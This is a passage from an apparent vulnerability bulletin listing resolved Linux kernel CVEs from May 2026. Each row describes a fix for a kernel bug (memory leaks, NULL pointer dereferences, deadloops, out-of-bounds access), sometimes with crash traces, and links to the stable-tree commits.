https://git.kernel.org/stable/c/dcf416eb88eafe1e3c0f920a14bdffd10bc4d259 https://git.kernel.org/stable/c/ad38f2cdfef9a2f2899c30cad269baec5bfd4a5d https://git.kernel.org/stable/c/cc2f39d6ac48e6e3cb2d6240bc0d6df839dd0828 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: starfive - Fix memory leak in starfive_aes_aead_do_one_req() The starfive_aes_aead_do_one_req() function allocates rctx->adata with kzalloc() but fails to free it if sg_copy_to_buffer() or starfive_aes_hw_init() fails, which lead to memory leaks. Since rctx->adata is unconditionally freed after the write_adata operations, ensure consistent cleanup by freeing the allocation in these earlier error paths as well. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45950 | https://git.kernel.org/stable/c/38d80307decc1132626a30e2a62af734630ecca5 https://git.kernel.org/stable/c/4869d0e4e48a5301b267d359b2561c4080791a55 https://git.kernel.org/stable/c/5f2c964a058581e1557c32d5de651c67a80438a7 https://git.kernel.org/stable/c/ccb679fdae2e62ed92fd9acb25ed809c0226fcc6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: eth: fbnic: Add validation for MTU changes Increasing the MTU beyond the HDS threshold causes the hardware to fragment packets across multiple buffers. If a single-buffer XDP program is attached, the driver will drop all multi-frag frames. While we can't prevent a remote sender from sending non-TCP packets larger than the MTU, this will prevent users from inadvertently breaking new TCP streams. Traditionally, drivers supported XDP with MTU less than 4Kb (packet per page). Fbnic currently prevents attaching XDP when MTU is too high. But it does not prevent increasing MTU after XDP is attached. | 2026-05-27 | not yet calculated | CVE-2026-45952 | https://git.kernel.org/stable/c/d7eaa006c0444a5d4671be7efe6dbb33ef8b515e https://git.kernel.org/stable/c/03399063aa0c67fd8bdfd69467ddb849bb3b97df https://git.kernel.org/stable/c/ccd8e87748ad083047d6c8544c5809b7f96cc8df |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5: fix IO hang with degraded array with llbitmap When llbitmap bit state is still unwritten, any new write should force rcw, as bitmap_ops->blocks_synced() is checked in handle_stripe_dirtying(). However, later the same check is missing in need_this_block(), causing stripe to deadloop during handling because handle_stripe() will decide to go to handle_stripe_fill(), meanwhile need_this_block() always return 0 and nothing is handled. | 2026-05-27 | not yet calculated | CVE-2026-45953 | https://git.kernel.org/stable/c/870b9f15867b0e70f3459ef3974b043e8b229690 https://git.kernel.org/stable/c/28ef299e7a5b81817f8ca8297c2ddff28f5da5e8 https://git.kernel.org/stable/c/cd1635d844d26471c56c0a432abdee12fc9ad735 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: au1200fb: Fix a memory leak in au1200fb_drv_probe() In au1200fb_drv_probe(), when platform_get_irq fails(), it directly returns from the function with an error code, which causes a memory leak. Replace it with a goto label to ensure proper cleanup. | 2026-05-27 | not yet calculated | CVE-2026-45954 | https://git.kernel.org/stable/c/81831d56b723bc1090ce3158feddaca88e85f939 https://git.kernel.org/stable/c/071d8fb757a8318f72c8e02898c2cf7e14e21fb6 https://git.kernel.org/stable/c/bd1ad63e11b2a568e98de536f319054d2de29f56 https://git.kernel.org/stable/c/3e5349e54113e2dce1a659c57935e18032742e56 https://git.kernel.org/stable/c/762a26818934241b8b0172a229d2cf5d87260e40 https://git.kernel.org/stable/c/3d4202ee6494c0d576cdc104b12e0834ca8136a8 https://git.kernel.org/stable/c/b024a8efee0f55d330a1cdd3eac8f79ac5acd3be https://git.kernel.org/stable/c/ce4e25198a6aaaaf36248edf8daf3d744ec8e309 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/md-llbitmap: fix percpu_ref not resurrected on suspend timeout When llbitmap_suspend_timeout() times out waiting for percpu_ref to become zero, it returns -ETIMEDOUT without resurrecting the percpu_ref. The caller (md_llbitmap_daemon_fn) then continues to the next page without calling llbitmap_resume(), leaving the percpu_ref in a killed state permanently. Fix this by resurrecting the percpu_ref before returning the error, ensuring the page control structure remains usable for subsequent operations. | 2026-05-27 | not yet calculated | CVE-2026-45955 | https://git.kernel.org/stable/c/095417d6b669c2dec39a5842ccb94df915f97f54 https://git.kernel.org/stable/c/2446d099350185caeed19ab2c0270451a97296fb https://git.kernel.org/stable/c/d119bd2e1643cc023210ff3c6f0657e4f914e71d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/exynos: vidi: use priv->vidi_dev for ctx lookup in vidi_connection_ioctl() vidi_connection_ioctl() retrieves the driver_data from drm_dev->dev to obtain a struct vidi_context pointer. However, drm_dev->dev is the exynos-drm master device, and the driver_data contained therein is not the vidi component device, but a completely different device. This can lead to various bugs, ranging from null pointer dereferences and garbage value accesses to, in unlucky cases, out-of-bounds errors, use-after-free errors, and more. To resolve this issue, we need to store/delete the vidi device pointer in exynos_drm_private->vidi_dev during bind/unbind, and then read this exynos_drm_private->vidi_dev within ioctl() to obtain the correct struct vidi_context pointer. | 2026-05-27 | not yet calculated | CVE-2026-45956 | https://git.kernel.org/stable/c/2987642c5213508c6c9e718324c0d5289a92c474 https://git.kernel.org/stable/c/65d1213baffa363f2eb1117b1dc7acc573b890f8 https://git.kernel.org/stable/c/875fa28690e93ed5296c31d3344556c6bb867234 https://git.kernel.org/stable/c/21ca24ba51a2c28bcc4df9d7e5a40b0eb66ab76d https://git.kernel.org/stable/c/b5fc86d753dd4c281a943b92f0eef02d31af03d7 https://git.kernel.org/stable/c/a540f767642f75240a6c35f6a65b69e44cfcea9d https://git.kernel.org/stable/c/d3968a0d85b211e197f2f4f06268a7031079e0d0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rcu: Fix rcu_read_unlock() deadloop due to softirq Commit 5f5fa7ea89dc ("rcu: Don't use negative nesting depth in __rcu_read_unlock()") removes the recursion-protection code from __rcu_read_unlock(). Therefore, we could invoke the deadloop in raise_softirq_irqoff() with ftrace enabled as follows: WARNING: CPU: 0 PID: 0 at kernel/trace/trace.c:3021 __ftrace_trace_stack.constprop.0+0x172/0x180 Modules linked in: my_irq_work(O) CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.18.0-rc7-dirty #23 PREEMPT(full) Tainted: [O]=OOT_MODULE Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 RIP: 0010:__ftrace_trace_stack.constprop.0+0x172/0x180 RSP: 0018:ffffc900000034a8 EFLAGS: 00010002 RAX: 0000000000000000 RBX: 0000000000000004 RCX: 0000000000000000 RDX: 0000000000000003 RSI: ffffffff826d7b87 RDI: ffffffff826e9329 RBP: 0000000000090009 R08: 0000000000000005 R09: ffffffff82afbc4c R10: 0000000000000008 R11: 0000000000011d7a R12: 0000000000000000 R13: ffff888003874100 R14: 0000000000000003 R15: ffff8880038c1054 FS: 0000000000000000(0000) GS:ffff8880fa8ea000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000055b31fa7f540 CR3: 00000000078f4005 CR4: 0000000000770ef0 PKRU: 55555554 Call Trace: <IRQ> trace_buffer_unlock_commit_regs+0x6d/0x220 trace_event_buffer_commit+0x5c/0x260 trace_event_raw_event_softirq+0x47/0x80 raise_softirq_irqoff+0x6e/0xa0 rcu_read_unlock_special+0xb1/0x160 unwind_next_frame+0x203/0x9b0 __unwind_start+0x15d/0x1c0 arch_stack_walk+0x62/0xf0 stack_trace_save+0x48/0x70 __ftrace_trace_stack.constprop.0+0x144/0x180 trace_buffer_unlock_commit_regs+0x6d/0x220 trace_event_buffer_commit+0x5c/0x260 trace_event_raw_event_softirq+0x47/0x80 raise_softirq_irqoff+0x6e/0xa0 rcu_read_unlock_special+0xb1/0x160 unwind_next_frame+0x203/0x9b0 __unwind_start+0x15d/0x1c0 arch_stack_walk+0x62/0xf0 stack_trace_save+0x48/0x70 __ftrace_trace_stack.constprop.0+0x144/0x180 trace_buffer_unlock_commit_regs+0x6d/0x220 trace_event_buffer_commit+0x5c/0x260 trace_event_raw_event_softirq+0x47/0x80 raise_softirq_irqoff+0x6e/0xa0 rcu_read_unlock_special+0xb1/0x160 unwind_next_frame+0x203/0x9b0 __unwind_start+0x15d/0x1c0 arch_stack_walk+0x62/0xf0 stack_trace_save+0x48/0x70 __ftrace_trace_stack.constprop.0+0x144/0x180 trace_buffer_unlock_commit_regs+0x6d/0x220 trace_event_buffer_commit+0x5c/0x260 trace_event_raw_event_softirq+0x47/0x80 raise_softirq_irqoff+0x6e/0xa0 rcu_read_unlock_special+0xb1/0x160 __is_insn_slot_addr+0x54/0x70 kernel_text_address+0x48/0xc0 __kernel_text_address+0xd/0x40 unwind_get_return_address+0x1e/0x40 arch_stack_walk+0x9c/0xf0 stack_trace_save+0x48/0x70 __ftrace_trace_stack.constprop.0+0x144/0x180 trace_buffer_unlock_commit_regs+0x6d/0x220 trace_event_buffer_commit+0x5c/0x260 trace_event_raw_event_softirq+0x47/0x80 __raise_softirq_irqoff+0x61/0x80 __flush_smp_call_function_queue+0x115/0x420 __sysvec_call_function_single+0x17/0xb0 sysvec_call_function_single+0x8c/0xc0 </IRQ> Commit b41642c87716 ("rcu: Fix rcu_read_unlock() deadloop due to IRQ work") fixed the infinite loop in rcu_read_unlock_special() for IRQ work by setting a flag before calling irq_work_queue_on(). We fix this issue by setting the same flag before calling raise_softirq_irqoff() and rename the flag to defer_qs_pending for more common. | 2026-05-27 | not yet calculated | CVE-2026-45957 | https://git.kernel.org/stable/c/979c708e6c9d7fc461daef2dad8b45f22e23464c https://git.kernel.org/stable/c/1f16679a5aa60238466ce339c35f5e82ece60337 https://git.kernel.org/stable/c/4a4a6e12c9c829be3f74b7206fa8640fc4e1c566 https://git.kernel.org/stable/c/c2932e16d8c354404b17123e64daa8e33191e145 https://git.kernel.org/stable/c/d41e37f26b3157b3f1d10223863519a943aa239b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: return error when node already exists in hfs_bnode_create When hfs_bnode_create() finds that a node is already hashed (which should not happen in normal operation), it currently returns the existing node without incrementing its reference count. This causes a reference count inconsistency that leads to a kernel panic when the node is later freed in hfs_bnode_put(): kernel BUG at fs/hfsplus/bnode.c:676! BUG_ON(!atomic_read(&node->refcnt)) This scenario can occur when hfs_bmap_alloc() attempts to allocate a node that is already in use (e.g., when node 0's bitmap bit is incorrectly unset), or due to filesystem corruption. Returning an existing node from a create path is not normal operation. Fix this by returning ERR_PTR(-EEXIST) instead of the node when it's already hashed. This properly signals the error condition to callers, which already check for IS_ERR() return values. | 2026-05-27 | not yet calculated | CVE-2026-45960 | https://git.kernel.org/stable/c/1ca428769cb4737a25bd32fb4d1573cc09eeaeef https://git.kernel.org/stable/c/507a1de58c21c95ad7c44afccaf1222d1c42246b https://git.kernel.org/stable/c/986455135b95f32c1f142068e451098fc751749e https://git.kernel.org/stable/c/7b57ada854b32310f224abd61bcfec2d5790ff0a https://git.kernel.org/stable/c/51838112d9c22502333c3085ca0c0d691e7093c6 https://git.kernel.org/stable/c/2e6ff6a6fc69cc17ed10c9cb6242935d52acd52d https://git.kernel.org/stable/c/2e9185a42e0e237c74435fd092b7c34537c62156 https://git.kernel.org/stable/c/d8a73cc46c8462a969a7516131feb3096f4c49d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: fix memory leaks in gfs2_fill_super error path Fix two memory leaks in the gfs2_fill_super() error handling path when transitioning a filesystem to read-write mode fails. First leak: kthread objects (thread_struct, task_struct, etc.) When gfs2_freeze_lock_shared() fails after init_threads() succeeds, the created kernel threads (logd and quotad) are never destroyed. This occurs because the fail_per_node label doesn't call gfs2_destroy_threads(). Second leak: quota bitmap buffer (8192 bytes) When gfs2_make_fs_rw() fails after gfs2_quota_init() succeeds but before other operations complete, the allocated quota bitmap is never freed. The fix moves thread cleanup to the fail_per_node label to handle all error paths uniformly. gfs2_destroy_threads() is safe to call unconditionally as it checks for NULL pointers. Quota cleanup is added in gfs2_make_fs_rw() to properly handle the withdrawal case where quota initialization succeeds but the filesystem is then withdrawn. Thread leak backtrace (gfs2_freeze_lock_shared failure): unreferenced object 0xffff88801d7bca80 (size 4480): copy_process+0x3a1/0x4670 kernel/fork.c:2422 kernel_clone+0xf3/0x6e0 kernel/fork.c:2779 kthread_create_on_node+0x100/0x150 kernel/kthread.c:478 init_threads+0xab/0x350 fs/gfs2/ops_fstype.c:611 gfs2_fill_super+0xe5c/0x1240 fs/gfs2/ops_fstype.c:1265 Quota leak backtrace (gfs2_make_fs_rw failure): unreferenced object 0xffff88812de7c000 (size 8192): gfs2_quota_init+0xe5/0x820 fs/gfs2/quota.c:1409 gfs2_make_fs_rw+0x7a/0xe0 fs/gfs2/super.c:149 gfs2_fill_super+0xfbb/0x1240 fs/gfs2/ops_fstype.c:1275 | 2026-05-27 | not yet calculated | CVE-2026-45961 | https://git.kernel.org/stable/c/e54229ecf49add8451d5f765a32c86ab4446e06c https://git.kernel.org/stable/c/da6f5bbc2e7902f578b503f2a4c3d8d09ca4b102 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: Validate SQE128 flag before accessing the cmd ublk_ctrl_cmd_dump() accesses (header *)sqe->cmd before IO_URING_F_SQE128 flag check. This could cause out of boundary memory access. Move the SQE128 flag check earlier in ublk_ctrl_uring_cmd() to return -EINVAL immediately if the flag is not set. | 2026-05-27 | not yet calculated | CVE-2026-45962 | https://git.kernel.org/stable/c/4b4dff498f46e9802f71bc84258bf73065f51c6a https://git.kernel.org/stable/c/31cac6acf77ece488f29fb8f79589d9298e969c8 https://git.kernel.org/stable/c/dbe8e81a2ec608f87f79a34f6444cd62f6a243bb https://git.kernel.org/stable/c/f75a5555e0049e7857eae25b60aee98b80e287ec https://git.kernel.org/stable/c/17d33ba7291100008360b5a354962db37ad80684 https://git.kernel.org/stable/c/da7e4b75e50c087d2031a92f6646eb90f7045a67 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: nau8821: Cancel delayed work on component remove Attempting to unload the driver while a jack detection work is pending would likely crash the kernel when it is eventually scheduled for execution: [ 1984.896308] BUG: unable to handle page fault for address: ffffffffc10c2a20 [...] [ 1984.896388] Hardware name: Valve Jupiter/Jupiter, BIOS F7A0131 01/30/2024 [ 1984.896396] Workqueue: events nau8821_jdet_work [snd_soc_nau8821] [ 1984.896414] RIP: 0010:__mutex_lock+0x9f/0x11d0 [...] [ 1984.896504] Call Trace: [ 1984.896511] <TASK> [ 1984.896524] ? snd_soc_dapm_disable_pin+0x26/0x60 [snd_soc_core] [ 1984.896572] ? snd_soc_dapm_disable_pin+0x26/0x60 [snd_soc_core] [ 1984.896596] snd_soc_dapm_disable_pin+0x26/0x60 [snd_soc_core] [ 1984.896622] nau8821_jdet_work+0xeb/0x1e0 [snd_soc_nau8821] [ 1984.896636] process_one_work+0x211/0x590 [ 1984.896649] ? srso_return_thunk+0x5/0x5f [ 1984.896670] worker_thread+0x1cd/0x3a0 Cancel unscheduled jdet_work or wait for its execution to finish before the component driver gets removed. | 2026-05-27 | not yet calculated | CVE-2026-45963 | https://git.kernel.org/stable/c/3955767ec39dcc0358470ffe6535703e2b7fd815 https://git.kernel.org/stable/c/dbd3fd05cddfdeec1e49b0a66269881c09eebd17 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SUNRPC: fix gss_auth kref leak in gss_alloc_msg error path Commit 5940d1cf9f42 ("SUNRPC: Rebalance a kref in auth_gss.c") added a kref_get(&gss_auth->kref) call to balance the gss_put_auth() done in gss_release_msg(), but forgot to add a corresponding kref_put() on the error path when kstrdup_const() fails. If service_name is non-NULL and kstrdup_const() fails, the function jumps to err_put_pipe_version which calls put_pipe_version() and kfree(gss_msg), but never releases the gss_auth reference. This leads to a kref leak where the gss_auth structure is never freed. Add a forward declaration for gss_free_callback() and call kref_put() in the err_put_pipe_version error path to properly release the reference taken earlier. | 2026-05-27 | not yet calculated | CVE-2026-45964 | https://git.kernel.org/stable/c/3b2b6c42070ce4204936288253baf101e995c2d3 https://git.kernel.org/stable/c/b559be2ec6cdb2e9c2c36c23fbbd4690d8a5c3f7 https://git.kernel.org/stable/c/a1bc9561b617ec7e2d09e6c134d1db8fcf9ca4a6 https://git.kernel.org/stable/c/655c9ba9915f05266998dbbf4b76b3c79b8a70aa https://git.kernel.org/stable/c/e464e26b2457005c87e158570498274b9f3b90c7 https://git.kernel.org/stable/c/c20f925214249bb4fc04f7e197bea142a6438af6 https://git.kernel.org/stable/c/a2d4e9a76de0b2178001214ba5de5bf94a7354aa https://git.kernel.org/stable/c/dd2fdc3504592d85e549c523b054898a036a6afe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: fix invalid deref of rawdata when export_binary is unset If the export_binary parameter is disabled on runtime, profiles that were loaded before that will still have their rawdata stored in apparmorfs, with a symbolic link to the rawdata on the policy directory. When one of those profiles are replaced, the rawdata is set to NULL, but when trying to resolve the symbolic links to rawdata for that profile, it will try to dereference profile->rawdata->name when profile->rawdata is now NULL causing an oops. Fix it by checking if rawdata is set. [ 168.653080] BUG: kernel NULL pointer dereference, address: 0000000000000088 [ 168.657420] #PF: supervisor read access in kernel mode [ 168.660619] #PF: error_code(0x0000) - not-present page [ 168.663613] PGD 0 P4D 0 [ 168.665450] Oops: Oops: 0000 [#1] SMP NOPTI [ 168.667836] CPU: 1 UID: 0 PID: 1729 Comm: ls Not tainted 6.19.0-rc7+ #3 PREEMPT(voluntary) [ 168.672308] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 168.679327] RIP: 0010:rawdata_get_link_base.isra.0+0x23/0x330 [ 168.682768] Code: 90 90 90 90 90 90 90 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 53 48 83 ec 18 48 89 55 d0 48 85 ff 0f 84 e3 01 00 00 <48> 83 3c 25 88 00 00 00 00 0f 84 d4 01 00 00 49 89 f6 49 89 cc e8 [ 168.689818] RSP: 0018:ffffcdcb8200fb80 EFLAGS: 00010282 [ 168.690871] RAX: ffffffffaee74ec0 RBX: 0000000000000000 RCX: ffffffffb0120158 [ 168.692251] RDX: ffffcdcb8200fbe0 RSI: ffff88c187c9fa80 RDI: ffff88c186c98a80 [ 168.693593] RBP: ffffcdcb8200fbc0 R08: 0000000000000000 R09: 0000000000000000 [ 168.694941] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88c186c98a80 [ 168.696289] R13: 00007fff005aaa20 R14: 0000000000000080 R15: ffff88c188f4fce0 [ 168.697637] FS: 0000790e81c58280(0000) GS:ffff88c20a957000(0000) knlGS:0000000000000000 [ 168.699227] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 168.700349] CR2: 0000000000000088 CR3: 000000012fd3e000 CR4: 0000000000350ef0 [ 168.701696] Call Trace: [ 168.702325] <TASK> [ 168.702995] rawdata_get_link_data+0x1c/0x30 [ 168.704145] vfs_readlink+0xd4/0x160 [ 168.705152] do_readlinkat+0x114/0x180 [ 168.706214] __x64_sys_readlink+0x1e/0x30 [ 168.708653] x64_sys_call+0x1d77/0x26b0 [ 168.709525] do_syscall_64+0x81/0x500 [ 168.710348] ? do_statx+0x72/0xb0 [ 168.711109] ? putname+0x3e/0x80 [ 168.711845] ? __x64_sys_statx+0xb7/0x100 [ 168.712711] ? x64_sys_call+0x10fc/0x26b0 [ 168.713577] ? do_syscall_64+0xbf/0x500 [ 168.714412] ? do_user_addr_fault+0x1d2/0x8d0 [ 168.715404] ? irqentry_exit+0xb2/0x740 [ 168.716359] ? exc_page_fault+0x90/0x1b0 [ 168.717307] entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2026-05-27 | not yet calculated | CVE-2026-45965 | https://git.kernel.org/stable/c/e6b2fc7e34d4e7ca6b8598c33a3d45d59e455d8d https://git.kernel.org/stable/c/6d8c180c825cbc73eeffaa79591f8e142dacae70 https://git.kernel.org/stable/c/3c36b87fc2a4cf88eadea8cf13923bd2b4f9a3fa https://git.kernel.org/stable/c/b25298e89a297c42eb4c4d6f081d60375b820abb https://git.kernel.org/stable/c/19f2e4055626a58842ddec3282ad4465a80c6625 https://git.kernel.org/stable/c/1d2b2b58fde9059a488bc25399e6c3d74e9b5548 https://git.kernel.org/stable/c/1432ab0774cba43e8111be39989ff226531a9bac https://git.kernel.org/stable/c/df9ac55abd18628bd8cff687ea043660532a3654 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: fix NULL pointer dereference in __unix_needs_revalidation When receiving file descriptors via SCM_RIGHTS, both the socket pointer and the socket's sk pointer can be NULL during socket setup or teardown, causing NULL pointer dereferences in __unix_needs_revalidation(). This is a regression in AppArmor 5.0.0 (kernel 6.17+) where the new __unix_needs_revalidation() function was added without proper NULL checks. The crash manifests as: BUG: kernel NULL pointer dereference, address: 0x0000000000000018 RIP: aa_file_perm+0xb7/0x3b0 (or +0xbe/0x3b0, +0xc0/0x3e0) Call Trace: apparmor_file_receive+0x42/0x80 security_file_receive+0x2e/0x50 receive_fd+0x1d/0xf0 scm_detach_fds+0xad/0x1c0 The function dereferences sock->sk->sk_family without checking if either sock or sock->sk is NULL first. Add NULL checks for both sock and sock->sk before accessing sk_family. | 2026-05-27 | not yet calculated | CVE-2026-45966 | https://git.kernel.org/stable/c/fea017a7f6abe179decf575a2d8464c74edb3964 https://git.kernel.org/stable/c/e85bc9101afc4202aa2269967ce9d3ffbecd0994 https://git.kernel.org/stable/c/e2938ad00b21340c0362562dfedd7cfec0554d67 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Return proper address for non-zero offsets in insn array The map_direct_value_addr() function of the instruction array map incorrectly adds offset to the resulting address. This is a bug, because later the resolve_pseudo_ldimm64() function adds the offset. Fix it. Corresponding selftests are added in a consequent commit. | 2026-05-27 | not yet calculated | CVE-2026-45967 | https://git.kernel.org/stable/c/73ef43202a37d779a8e665a0acae214fa59df9fb https://git.kernel.org/stable/c/e3bd7bdf5ffe49d8381e42843f6e98cd0c78a1e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpuidle: Skip governor when only one idle state is available On certain platforms (PowerNV systems without a power-mgt DT node), cpuidle may register only a single idle state. In cases where that single state is a polling state (state 0), the ladder governor may incorrectly treat state 1 as the first usable state and pass an out-of-bounds index. This can lead to a NULL enter callback being invoked, ultimately resulting in a system crash. [ 13.342636] cpuidle-powernv : Only Snooze is available [ 13.351854] Faulting instruction address: 0x00000000 [ 13.376489] NIP [0000000000000000] 0x0 [ 13.378351] LR [c000000001e01974] cpuidle_enter_state+0x2c4/0x668 Fix this by adding a bail-out in cpuidle_select() that returns state 0 directly when state_count <= 1, bypassing the governor and keeping the tick running. | 2026-05-27 | not yet calculated | CVE-2026-45968 | https://git.kernel.org/stable/c/a0f7e804edc82e513d1ccb7c95ed8b351522ec81 https://git.kernel.org/stable/c/5d103a38e2ae96eca57fd17161bcd29bd4622d1c https://git.kernel.org/stable/c/4da2b897283c39980d6ae09dc1560fcd937879e5 https://git.kernel.org/stable/c/5c577ac939bca486cb02069505cfe47a5312ce02 https://git.kernel.org/stable/c/8f6833d919bae915ead6c599a53e81e19b32da52 https://git.kernel.org/stable/c/63ae78336f40bcd9a44952a7c6bafb9c88a8effd https://git.kernel.org/stable/c/a0724e40a58a0e323c59707edeae5b71d15800dc https://git.kernel.org/stable/c/e5c9ffc6ae1bcdb1062527d611043681ac301aca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: playstation: Add missing check for input_ff_create_memless The ps_gamepad_create() function calls input_ff_create_memless() without verifying its return value, which can lead to incorrect behavior or potential crashes when FF effects are triggered. Add a check for the return value of input_ff_create_memless(). | 2026-05-27 | not yet calculated | CVE-2026-45969 | https://git.kernel.org/stable/c/496a345cc047a2c2d9d5a76956e1182525578bd5 https://git.kernel.org/stable/c/987dee1486e975e2baa6a5d062cfdf18bbe901c8 https://git.kernel.org/stable/c/33acf9a4d6eb1f6d01691faca96ad6b2ab0fcfc0 https://git.kernel.org/stable/c/d955aeb26e1210a018492b3b32cbdfaf017aaa25 https://git.kernel.org/stable/c/35301ca2a83d17aac2f3e8e35c696f0da2a13111 https://git.kernel.org/stable/c/45b01d85265bc1ccdd69e0a7887db4b905a778f4 https://git.kernel.org/stable/c/e6807641ac94e832988655a1c0e60ccc806b76dc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Limit bpf program signature size Practical BPF signatures are significantly smaller than KMALLOC_MAX_CACHE_SIZE Allowing larger sizes opens the door for abuse by passing excessive size values and forcing the kernel into expensive allocation paths (via kmalloc_large or vmalloc). | 2026-05-27 | not yet calculated | CVE-2026-45971 | https://git.kernel.org/stable/c/5835a077c6f5c565d525eaca9fac01572b97a9b9 https://git.kernel.org/stable/c/eb8166c79097996396468a341de258a798789d36 https://git.kernel.org/stable/c/ea1535e28bb3773fc0b3cbd1f3842b808016990c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx5: Fix UMR hang in LAG error state unload During firmware reset in LAG mode, a race condition causes the driver to hang indefinitely while waiting for UMR completion during device unload. See [1]. In LAG mode the bond device is only registered on the master, so it never sees sys_error events from the slave. During firmware reset this causes UMR waits to hang forever on unload as the slave is dead but the master hasn't entered error state yet, so UMR posts succeed but completions never arrive. Fix this by adding a sys_error notifier that gets registered before MLX5_IB_STAGE_IB_REG and stays alive until after ib_unregister_device(). This ensures error events reach the bond device throughout teardown. [1] Call Trace: __schedule+0x2bd/0x760 schedule+0x37/0xa0 schedule_preempt_disabled+0xa/0x10 __mutex_lock.isra.6+0x2b5/0x4a0 __mlx5_ib_dereg_mr+0x606/0x870 [mlx5_ib] ? __xa_erase+0x4a/0xa0 ? _cond_resched+0x15/0x30 ? wait_for_completion+0x31/0x100 ib_dereg_mr_user+0x48/0xc0 [ib_core] ? rdmacg_uncharge_hierarchy+0xa0/0x100 destroy_hw_idr_uobject+0x20/0x50 [ib_uverbs] uverbs_destroy_uobject+0x37/0x150 [ib_uverbs] __uverbs_cleanup_ufile+0xda/0x140 [ib_uverbs] uverbs_destroy_ufile_hw+0x3a/0xf0 [ib_uverbs] ib_uverbs_remove_one+0xc3/0x140 [ib_uverbs] remove_client_context+0x8b/0xd0 [ib_core] disable_device+0x8c/0x130 [ib_core] __ib_unregister_device+0x10d/0x180 [ib_core] ib_unregister_device+0x21/0x30 [ib_core] __mlx5_ib_remove+0x1e4/0x1f0 [mlx5_ib] auxiliary_bus_remove+0x1e/0x30 device_release_driver_internal+0x103/0x1f0 bus_remove_device+0xf7/0x170 device_del+0x181/0x410 mlx5_rescan_drivers_locked.part.10+0xa9/0x1d0 [mlx5_core] mlx5_disable_lag+0x253/0x260 [mlx5_core] mlx5_lag_disable_change+0x89/0xc0 [mlx5_core] mlx5_eswitch_disable+0x67/0xa0 [mlx5_core] mlx5_unload+0x15/0xd0 [mlx5_core] mlx5_unload_one+0x71/0xc0 [mlx5_core] mlx5_sync_reset_reload_work+0x83/0x100 [mlx5_core] process_one_work+0x1a7/0x360 worker_thread+0x30/0x390 ? create_worker+0x1a0/0x1a0 kthread+0x116/0x130 ? kthread_flush_work_fn+0x10/0x10 ret_from_fork+0x22/0x40 | 2026-05-27 | not yet calculated | CVE-2026-45973 | https://git.kernel.org/stable/c/c8fb5c965ac7d0104872a8e4f6451f3bc6328199 https://git.kernel.org/stable/c/6d838873da9cb97551d42316967cc82bf8f8031b https://git.kernel.org/stable/c/613f5d4139b6ba801ccd93f9a28943be60d903bc https://git.kernel.org/stable/c/ebc2164a4cd4314503f1a0c8e7aaf76d7e5fa211 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix invalid leaf access in btrfs_quota_enable() if ref key not found If btrfs_search_slot_for_read() returns 1, it means we did not find any key greater than or equals to the key we asked for, meaning we have reached the end of the tree and therefore the path is not valid. If this happens we need to break out of the loop and stop, instead of continuing and accessing an invalid path. | 2026-05-27 | not yet calculated | CVE-2026-45974 | https://git.kernel.org/stable/c/023545e272f369d487e6a986c1e321c6e04be1da https://git.kernel.org/stable/c/fd4913a53e3b54ad7e161847291439fe445d6356 https://git.kernel.org/stable/c/b5b8ade9da452086e78f5d519b90d3769e354853 https://git.kernel.org/stable/c/1ee1d006c9fe4d6be5527ab1c84216b80cccbe40 https://git.kernel.org/stable/c/0761447f6f51e1c7997960d8e6559337deed6729 https://git.kernel.org/stable/c/d7cf2314dd5e8661c05d076cd627eea9a7f76616 https://git.kernel.org/stable/c/b2bd557b75b760e4b9d209112bda19314bd64558 https://git.kernel.org/stable/c/ecb7c2484cfc83a93658907580035a8adf1e0a92 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: use READ_ONCE() to read struct ublksrv_ctrl_cmd struct ublksrv_ctrl_cmd is part of the io_uring_sqe, which may lie in userspace-mapped memory. It's racy to access its fields with normal loads, as userspace may write to them concurrently. Use READ_ONCE() to copy the ublksrv_ctrl_cmd from the io_uring_sqe to the stack. Use the local copy in place of the one in the io_uring_sqe. | 2026-05-27 | not yet calculated | CVE-2026-45975 | https://git.kernel.org/stable/c/ce63eda3e6d36e2c253febee1c8421ecbd1a680e https://git.kernel.org/stable/c/ed9f54cc1e335096733aed03c2a46de3d58922ed |
